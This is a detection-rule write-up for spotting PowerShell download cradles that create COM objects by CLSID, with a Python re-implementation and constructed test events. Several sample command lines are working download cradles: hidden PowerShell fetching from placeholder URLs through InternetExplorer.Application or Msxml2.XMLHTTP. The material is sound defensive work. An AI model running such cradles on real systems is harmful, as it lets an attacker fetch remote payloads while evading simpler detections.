
Summary
This detection rule identifies PowerShell downloading files through a COM object that is instantiated by its Class ID (CLSID) rather than by its ProgID. It looks for the `GetTypeFromCLSID` method call in the process command line together with the CLSIDs of COM classes that can fetch content from a URL. Instantiating such a class by CLSID avoids the readable ProgID that simpler detections key on (for example a `New-Object -ComObject` call with a well-known name), which is why the pattern appears in command-and-control download cradles. The rule is built from two selections, one matching the `GetTypeFromCLSID` call and one matching the list of CLSIDs of interest, and it fires when a process command line satisfies both. It is aimed at threat hunters and incident responders investigating PowerShell abuse on Windows endpoints, and it requires process-creation logging that records the full command line (for example Security event 4688 with command-line auditing enabled, or Sysmon event 1). Review the context of each hit: the same COM classes have legitimate uses in administrative scripts, so check the parent process, the user and the URL being fetched before escalating. Because the match is a plain string match on the command line, a `GetTypeFromCLSID` call that lives in a script file, in an encoded command or in a concatenated string will not be visible to this rule.
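The two-selection logic described above, written out as an added Python example that is not part of the rule or of the project it belongs to. The CLSID list is an assumption built from two well-known download-capable COM classes and does not reproduce the rule's own list; the process-creation events are constructed, not real telemetry.

```python
"""Added example: re-implementation of a two-selection command-line rule.

Selection 1 matches the `GetTypeFromCLSID(` call, selection 2 matches any
CLSID from a list; an event fires only when both hit. Illustrative code, not
the rule's definition. The CLSID list is an assumption (two well-known
download-capable COM classes), not the rule's actual list.
"""

import re
from dataclasses import dataclass
from typing import Optional

# Assumption: CLSIDs of COM classes that can fetch content from a URL.
# Well-known values used here for illustration only.
DOWNLOAD_CLSIDS = {
    "0002DF01-0000-0000-C000-000000000046": "InternetExplorer.Application",
    "F6D90F16-9C73-11D3-B32E-00C04F990BB4": "Msxml2.XMLHTTP",
}

# Selection 1: the method call. Case-insensitive because PowerShell is
# case-insensitive and attackers vary casing freely.
METHOD_RE = re.compile(r"GetTypeFromCLSID\s*\(", re.IGNORECASE)

# Selection 2: any listed CLSID. Braces are not part of the pattern, so both
# '{...}' and bare forms match.
CLSID_RE = re.compile("|".join(re.escape(c) for c in DOWNLOAD_CLSIDS), re.IGNORECASE)


@dataclass
class Match:
    image: str
    clsid: str
    progid: str
    command_line: str


def evaluate(event: dict) -> Optional[Match]:
    """Return a Match when both selections hit the event's CommandLine, else None."""
    cmd = event.get("CommandLine", "")
    if not METHOD_RE.search(cmd):          # selection 1
        return None
    hit = CLSID_RE.search(cmd)             # selection 2
    if not hit:
        return None
    clsid = hit.group(0).upper()
    return Match(event.get("Image", ""), clsid, DOWNLOAD_CLSIDS[clsid], cmd)


def run(events) -> list:
    """Apply the rule to a batch of process-creation events, keeping the hits."""
    return [m for m in (evaluate(e) for e in events) if m is not None]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # download cradle via a COM class instantiated by CLSID: should fire
        "Image": PS,
        "CommandLine": "powershell.exe -nop -w hidden -c \"$ie=[Activator]::CreateInstance("
                       "[Type]::GetTypeFromCLSID('0002DF01-0000-0000-C000-000000000046'));"
                       "$ie.Navigate('http://example.invalid/p')\"",
    },
    {   # same technique, braces and lower case: should still fire
        "Image": PS,
        "CommandLine": "powershell -c \"$x=[activator]::CreateInstance([type]::gettypefromclsid("
                       "'{f6d90f16-9c73-11d3-b32e-00c04f990bb4}'));"
                       "$x.open('GET','http://example.invalid/a',$false);$x.send()\"",
    },
    {   # ProgID-based download: out of scope for this rule (no CLSID on the line)
        "Image": PS,
        "CommandLine": "powershell -c \"(New-Object -ComObject Msxml2.XMLHTTP)\"",
    },
    {   # GetTypeFromCLSID with a placeholder CLSID that is not listed: only selection 1 hits
        "Image": PS,
        "CommandLine": "powershell -c \"[Type]::GetTypeFromCLSID('00000000-0000-0000-0000-000000000000')\"",
    },
    {   # encoded command: the strings are not on the command line, so no match
        "Image": PS,
        "CommandLine": "powershell -EncodedCommand ZABpAHIA",
    },
]


if __name__ == "__main__":
    for m in run(SAMPLE_EVENTS):
        print(f"ALERT {m.progid} ({m.clsid}): {m.command_line}")
```

Running the block prints two alerts, for the first two events only. The last two events show the rule's blind spots: the placeholder CLSID satisfies selection 1 but not selection 2, and the encoded command satisfies neither even though the decoded script may contain exactly the pattern being hunted. Pairing this rule with PowerShell Script Block Logging (event 4104), which records the de-obfuscated script, closes the gap for encoded and concatenated invocations.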
Categories
- Windows
- Endpoint
Data Sources
- Process
Created: 2022-12-25